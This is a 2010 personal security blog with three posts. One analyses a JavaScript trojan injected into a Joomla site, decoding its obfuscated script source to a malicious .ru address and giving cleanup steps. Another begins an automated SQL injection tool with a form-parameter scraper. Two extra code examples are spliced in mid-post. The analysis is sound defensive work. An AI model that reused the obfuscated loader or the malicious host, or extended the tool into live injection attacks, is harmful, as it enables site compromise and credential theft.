Saturday, January 16, 2010

Analysis of a Javascript Trojan found on a joomla based website

Yesterday, I got my first freelance job. The owner of the website explained that users were complaining that their spyware detection application raised an alert whenever they opened certain pages on the site.
It didn't take long to figure out where the Trojan was hiding and how it attacks.
As soon as I opened the About and the Contact pages, Nod32 alerted that the pages I was viewing contained malicious JavaScript. When I viewed the source code I saw this suspicious script:

The interesting part is the strange code on lines 7 to 13 of the script. This code is the second parameter of the setAttribute function, so the call looks like this: setAttribute('src', strange code).
This function sets the value of an attribute on an element. It is typically used on elements returned by document.getElementById to assign a new value to one of the element's attributes.
Notice the string.replace call at line 13? It replaces the characters !, @, #, $, %, ^, &, (, ) with nothing. I wrote a simple Python script that does the same replacement:
import sys

strange_code = 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'

strange_code = strange_code.replace('!', '')
strange_code = strange_code.replace('@', '')
strange_code = strange_code.replace('#', '')
strange_code = strange_code.replace('$', '')
strange_code = strange_code.replace('%', '')
strange_code = strange_code.replace('^', '')
strange_code = strange_code.replace('&', '')
strange_code = strange_code.replace('(', '')
strange_code = strange_code.replace(')', '')

print strange_code
The result:

http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/

Basically this script adds a reference to a JavaScript file located at the address above. I followed the address and found a script that opens an invisible iframe. Through this invisible iframe the attackers can steal information such as online banking credentials.
How to remove this Trojan?
Simply remove it from every page you find it in.
How to prevent it from infecting your files again?
It probably infected the files through FTP, so:
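The same deobfuscation done in one pass, as an added example that is not the post's own code. The obfuscated string is the one from the script found on the site and the junk set is the one its replace() calls remove; real_host and decoy_names are helper names chosen here to separate the server a browser would actually contact from the bank and search-engine names embedded in the path.

```python
from urllib.parse import urlsplit

# The characters the script's chain of replace() calls removes
JUNK = "!@#$%^&()"

# Obfuscated string copied from the script found on the site
STRANGE_CODE = 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'


def deobfuscate(code, junk=JUNK):
    """Delete every junk character in one pass; same result as the replace() chain."""
    return code.translate(str.maketrans("", "", junk))


def real_host(url):
    """Return (hostname, port) of the server a browser would actually contact.
    Only the netloc matters; everything after the first '/' is just a path."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("decoded text is not an http(s) URL: %r" % url)
    return parts.hostname, parts.port


def decoy_names(url):
    """Path segments that look like domain names: lookalike decoys meant to make
    the URL appear to belong to a bank or a search engine."""
    return [seg for seg in urlsplit(url).path.split("/") if "." in seg]


if __name__ == "__main__":
    url = deobfuscate(STRANGE_CODE)
    print(url)
    print("contacts:", real_host(url))
    print("decoys in path:", decoy_names(url))
```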
1. Change your FTP credentials.
2. Install a good anti-spyware application.
3. Don't use public machines to access your FTP.
4. Check the files that users are uploading to your website.

Friday, January 8, 2010

Automatic SQL injection tool using Python - Part 1

This is the first post of several in which I'll create a simple SQL injection tool using Python. Actually, this is also the first time I've programmed in Python, so comments and suggestions for improvement are welcome.
In order to automate the injection we must first discover the injection points, which are the HTML form parameters (POST and GET parameters). To extract those parameters I used BeautifulSoup, a simple and effective HTML parser.
With BeautifulSoup it's easy to build applications that process web pages, such as a web scraper. You can get the parser from www.crummy.com/software/BeautifulSoup/download/3.x/BeautifulSoup-3.0.0.py. Rename the file to BeautifulSoup.py and place it under the site-packages folder. For example, with Python 2.5 on Windows it should be under "C:\Python25\Lib\site-packages"; with Python 2.5 on Linux it should be under "/usr/lib/python2.5/site-packages".
The code:

import sys
import urllib2
from BeautifulSoup import BeautifulSoup

if len(sys.argv) != 3 or sys.argv[1].lower() not in ('get', 'post'):
    print "Usage: form_params.py [GET/POST] [url]"
    sys.exit(1)

method = sys.argv[1].lower()
# strip a trailing slash so the address can be joined with a relative form action
address = sys.argv[2].rstrip('/')

# load the html page into a string variable
html = urllib2.urlopen(address).read()

# load the string into a BeautifulSoup object
soup = BeautifulSoup(html)

# input types whose value is submitted with the form
INPUT_TYPES = ('text', 'password', 'hidden', 'radio')

def printParams(forms):
    # for each form tag in all form tags, do:
    for form in forms:
        print "-----------------------------------------------------------"
        if form.has_key('action') and form['action'].find('://') == -1:
            # relative action: join it with the page address
            print "action: " + address + "/" + form['action'].strip('/')
        elif form.has_key('action'):
            # absolute action: use it as it is
            print "action: " + form['action']
        else:
            # no action attribute: the form is submitted to the page itself
            print "action: " + address
        # a form without a method attribute is submitted with GET
        form_method = 'get'
        if form.has_key('method'):
            form_method = form['method'].lower()
        if form_method != method:
            continue
        for form_input in form.findAll("input"):
            if form_input.has_key('type') and form_input['type'].lower() in INPUT_TYPES:
                # the name attribute is what the browser submits; fall back to id
                if form_input.has_key('name'):
                    print form_input['name']
                elif form_input.has_key('id'):
                    print form_input['id']

# find all occurrences of the form tag and send them to printParams
printParams(soup.findAll("form"))

You can also download the source file from here.
Usage: form_params.py method url
method: post or get
example: form_params.py post http://www.facebook.com
result:

-----------------------------------------------------------
action: http://www.facebook.com
charset_test
locale
non_com_login
email
pass
pass_placeholder
charset_test
lsd
-----------------------------------------------------------
action: http://www.facebook.com
charset_test
locale
terms
reg_instance
firstname
lastname
reg_email__
reg_passwd__
referrer
challenge
md5pass
captcha_persist_data
captcha_session
extra_challenge_params
captcha_response
-----------------------------------------------------------
action: http://www.facebook.com
locale
confirmation_email
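The same form-parameter discovery using only the standard library, as an added example that is not part of the post. The sample page and the names FormParser and form_params are constructed here; unlike the BeautifulSoup script above it resolves relative actions with urljoin against the page URL, treats a form without a method attribute as GET, and also collects select and textarea fields, which are submitted as parameters too.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample page: a relative POST form and an absolute GET form
SAMPLE_HTML = """
<html><body>
<form action="/user/login" method="POST">
  <input type="text" name="username" id="user-field">
  <input type="password" name="password">
  <input type="hidden" name="token" value="abc">
  <input type="submit" value="Log in">
</form>
<form action="http://search.example.test/q">
  <input type="text" name="q">
  <select name="lang"><option>en</option></select>
  <textarea name="notes"></textarea>
</form>
</body></html>
"""

# input types whose value is sent with the form (submit buttons are left out)
SUBMITTED_INPUT_TYPES = {"text", "password", "hidden", "radio", "checkbox",
                         "search", "email", "url", "number"}


class FormParser(HTMLParser):
    """Collect, per form, its resolved action, its method and the parameter names it submits."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self.current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"action": urljoin(self.base_url, a.get("action") or ""),
                            "method": (a.get("method") or "get").lower(),
                            "params": []}
            self.forms.append(self.current)
        elif self.current is not None and a.get("name"):
            # the name attribute is what the browser sends, not the id
            if tag in ("textarea", "select") or (
                    tag == "input" and (a.get("type") or "text").lower() in SUBMITTED_INPUT_TYPES):
                self.current["params"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None


def form_params(html, base_url, method):
    """Return the forms of the page that are submitted with the given method."""
    parser = FormParser(base_url)
    parser.feed(html)
    return [f for f in parser.forms if f["method"] == method.lower()]
```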

-Herzel

Saturday, January 2, 2010

My first blog post

Welcome to my first post.
In this blog I intend to write mostly about my experience and discoveries with information security related issues.
Recently I started working at AppliCure Technologies, a software company whose main product is a WAF (Web Application Firewall).
The world of information security has always intrigued me, but I never addressed it seriously. Well, I hope to change that now.
Later on I intend to share discoveries, write code or maybe just express an opinion. Hope you enjoy this blog.

- Herzel